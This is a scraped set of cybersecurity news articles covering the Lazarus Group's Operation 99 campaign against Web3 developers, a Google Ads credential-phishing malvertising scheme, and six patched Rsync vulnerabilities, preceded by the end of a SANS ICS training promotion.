critical functions that drive business in ICS organizations and critical infrastructurenamely, the operational technologies at Purdue Levels 1 to Level 3.5 to start for exampleorganizations and utilities can enhance security to operate more safely and efficiently in today's ICS/OT cyber threat landscape. Leadership and tactical analysts in ICS/OT critical infrastructure sector utilities can verify and/or implement the threat-driven prioritized SANS Five ICS Cybersecurity Critical Controls.Tactical analysts can attend my course run of ICS515 - a 6-day technical ICS/OT incident response and visibility training this February at the SANS New Orleans event Powered by ICS Security.Join industry peers, SANS expert instructors, and practitioners for hands-on workshop and ICS/OT security training at the 20th Annual ICS Security Summit in Orlando this coming June 15-17. About the AuthorDean Parsons is a renowned ICS/OT security expert with over 20 years of experience in the field. As a prominent figure at SANS, Dean has devoted his career to advancing the defense posture of critical infrastructure in all sectors, worldwide.Join Dean in class for ICS515 in New Orleans, Orlando, San Diego, or another convenient time in 2025 for tactical ICS/OT cybersecurity defense, and connect with him and other ICS/OT experts at this year's 20th Anniversary SANS ICS Summit in June 2025 in Orlando.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware."The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat Research and Intelligence at SecurityScorecard, said in a new report published today."Once a victim takes the bait, they're directed to clone a malicious GitLab repository seemingly harmless, but packed with disaster. The cloned code connects to command-and-control (C2) servers, embedding malware into the victim's environment."Victims of the campaign have been identified across the globe, with a significant concentration recorded in Italy. A lesser number of impacted victims are located in Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S.The cybersecurity company said the campaign, which it discovered on January 9, 2025, builds on job-themed tactics previously observed in Lazarus attacks, such as Operation Dream Job (aka NukeSped), to particularly focus on targeting developers in Web3 and cryptocurrency fields.What makes Operation 99 unique is that it entices developers with coding projects as part of an elaborate recruitment scheme that involves crafting deceptive LinkedIn profiles, which are then used to direct them to rogue GitLab repositories. The end goal of the attacks is to deploy data-stealing implants that are capable of extracting source code, secrets, cryptocurrency wallet keys, and other sensitive data from development environments.These include Main5346 and its variant Main99, which serves as a downloader for three additional payloads -Payload99/73 (and its functionally similar Payload5346), which collects system data (e.g., files and clipboard content), terminate web browser processes, executes arbitrary, and establishes a persistent connection to the C2 serverBrow99/73, which steals data from web browsers to facilitate credential theftMCLIP, which monitors and exfiltrates keyboard and clipboard activity in real-time"By compromising developer accounts, attackers not only exfiltrate intellectual property but also gain access to cryptocurrency wallets, enabling direct financial theft," the company said. "The targeted theft of private and secret keys could lead to millions in stolen digital assets, furthering the Lazarus Group's financial goals."The malware architecture adopts a modular design and is flexible, and capable of working across Windows, macOS, and Linux operating systems. It also serves to highlight the ever-evolving and adaptable nature of nation-state cyber threats."For North Korea, hacking is a revenue generating lifeline," Sherstobitoff said. "The Lazarus Group has consistently funneled stolen cryptocurrency to fuel the regime's ambitions, amassing staggering sums. With Web3 and cryptocurrency industries booming, Operation 99 zeroes in on these high-growth sectors."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

Jan 15, 2025Ravie LakshmananMalvertising / MalwareCybersecurity researchers have alerted to a new malvertising campaign that's targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google."The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages," Jrme Segura, senior director of threat intelligence at Malwarebytes, said in a report shared with The Hacker News.It's suspected the end goal of the campaign is to reuse the stolen credentials to further perpetuate the campaigns, while also selling them to other criminal actors on underground forums. Based on posts shared on Reddit, Bluesky, and Google's own support forums, the threat has been active since at least mid-November 2024. The activity cluster is a lot similar to campaigns that leverage stealer malware to steal data related to Facebook advertising and business accounts in order to hijack them and use the accounts for push-out malvertising campaigns that further propagate the malware.The newly identified campaign specifically singles out users who search for Google Ads on Google's own search engine to serve bogus ads for Google Ads that, when clicked, redirect users to fraudulent sites hosted on Google Sites.These sites then serve as landing pages to lead the visitors to external phishing sites that are designed to capture their credentials and two-factor authentication (2FA) codes via a WebSocket and exfiltrated to a remote server under the attacker's control. "The fake ads for Google Ads come from a variety of individuals and businesses (including a regional airport), in various locations," Segura said. "Some of those accounts already had hundreds of other legitimate ads running."An ingenious aspect of the campaign is that it takes advantage of the fact that Google Ads does not require the final URL the web page that users reach when they click on the ad to be the same as the display URL, as long as the domains match.This allows the threat actors to host their intermediate landing pages on sites.google[.]com while keeping the display URLs as ads.google[.]com. What's more, the modus operandi entails the use of techniques like fingerprinting, anti-bot traffic detection, a CAPTCHA-inspired lure, cloaking, and obfuscation to conceal the phishing infrastructure.Malwarebytes said the harvested credentials are subsequently abused to sign in to the victim's Google Ads account, add a new administrator, and utilize their spending budgets for fake Google ads.In other words, the threat actors are taking over Google Ads accounts to push their own ads in order to add new victims to a growing pool of hacked accounts that are used to perpetuate the scam further. "There appears to be several individuals or groups behind these campaigns," Segura said. "Notably, the majority of them are Portuguese speakers and likely operating out of Brazil. The phishing infrastructure relies on intermediary domains with the .pt top-level domain (TLD), indicative of Portugal.""This malicious ad activity does not violate Google's ad rules. Threat actors are allowed to show fraudulent URLs in their ads, making them indistinguishable from legitimate sites. Google has yet to show that it takes definitive steps to freeze such accounts until their security is restored."The disclosure comes as Trend Micro revealed that attackers are using platforms such as YouTube and SoundCloud to distribute links to fake installers for pirated versions of popular software that ultimately lead to the deployment of various malware families such as Amadey, Lumma Stealer, Mars Stealer, Penguish, PrivateLoader, and Vidar Stealer."Threat actors often use reputable file hosting services like Mediafire and Mega.nz to conceal the origin of their malware and make detection and removal more difficult," the company said. "Many malicious downloads are password-protected and encoded, which complicates analysis in security environments such as sandboxes and allows malware to evade early detection."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE

Jan 15, 2025Ravie LakshmananVulnerability / Software UpdateAs many as six security vulnerabilities have been disclosed in the popular Rsync file-synchronizing tool for Unix systems, some of which could be exploited to execute arbitrary code on a client."Attackers can take control of a malicious server and read/write arbitrary files of any connected client," the CERT Coordination Center (CERT/CC) said in an advisory. "Sensitive data, such as SSH keys, can be extracted, and malicious code can be executed by overwriting files such as ~/.bashrc or ~/.popt."The shortcomings, which comprise heap-buffer overflow, information disclosure, file leak, external directory file-write, and symbolic-link race condition, are listed below -CVE-2024-12084 (CVSS score: 9.8) - Heap-buffer overflow in Rsync due to improper checksum length handlingCVE-2024-12085 (CVSS score: 7.5) - Information leak via uninitialized stack contentsCVE-2024-12086 (CVSS score: 6.1) - Rsync server leaks arbitrary client filesCVE-2024-12087 (CVSS score: 6.5) - Path traversal vulnerability in RsyncCVE-2024-12088 (CVSS score: 6.5) - --safe-links option bypass leads to path traversalCVE-2024-12747 (CVSS score: 5.6) - Race condition in Rsync when handling symbolic linksSimon Scannell, Pedro Gallegos, and Jasiel Spelman from Google Cloud Vulnerability Research have been credited with discovering and reporting the first five flaws. Security researcher Aleksei Gorban has been acknowledged for the symbolic-link race condition flaw."In the most severe CVE, an attacker only requires anonymous read access to a Rsync server, such as a public mirror, to execute arbitrary code on the machine the server is running on," Red Hat Product Security's Nick Tait said.CERT/CC also noted that an attacker could combine CVE-2024-12084 and CVE-2024-12085 to achieve arbitrary code execution on a client that has a Rsync server running.Patches for the vulnerabilities have been released in Rsync version 3.4.0, which was made available earlier today. For users who are unable to apply the update, the following mitigations are recommended -CVE-2024-12084 - Disable SHA* support by compiling with CFLAGS=-DDISABLE_SHA512_DIGEST and CFLAGS=-DDISABLE_SHA256_DIGESTCVE-2024-12085 - Compile with -ftrivial-auto-var-init=zero to zero the stack contentsFound this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE